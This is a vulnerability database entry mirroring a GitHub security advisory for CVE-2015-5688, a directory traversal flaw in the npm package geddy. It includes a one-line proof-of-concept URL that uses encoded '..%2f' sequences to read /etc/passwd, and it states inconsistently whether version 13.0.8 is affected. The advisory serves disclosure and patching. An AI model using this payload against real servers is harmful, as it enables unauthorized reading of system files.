GHSA-333X-9VGQ-V2J4
Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2021-08-31 20:33
VLAI?
Summary
Directory Traversal in geddy
Details
Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.
Proof of Concept
http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Recommendation
Update geddy to version >= 13.0.8
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "geddy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2015-5688"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T20:53:48Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.\n\n### Proof of Concept\n```\nhttp://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n```\n\n\n## Recommendation\n\nUpdate geddy to version \u003e= 13.0.8",
"id": "GHSA-333x-9vgq-v2j4",
"modified": "2021-08-31T20:33:50Z",
"published": "2017-10-24T18:33:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5688"
},
{
"type": "WEB",
"url": "https://github.com/geddy/geddy/issues/697"
},
{
"type": "WEB",
"url": "https://github.com/geddy/geddy/pull/699"
},
{
"type": "WEB",
"url": "https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-333x-9vgq-v2j4"
},
{
"type": "PACKAGE",
"url": "https://github.com/geddy/geddy"
},
{
"type": "WEB",
"url": "https://github.com/geddy/geddy/releases/tag/v13.0.8"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/10"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Directory Traversal in geddy"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…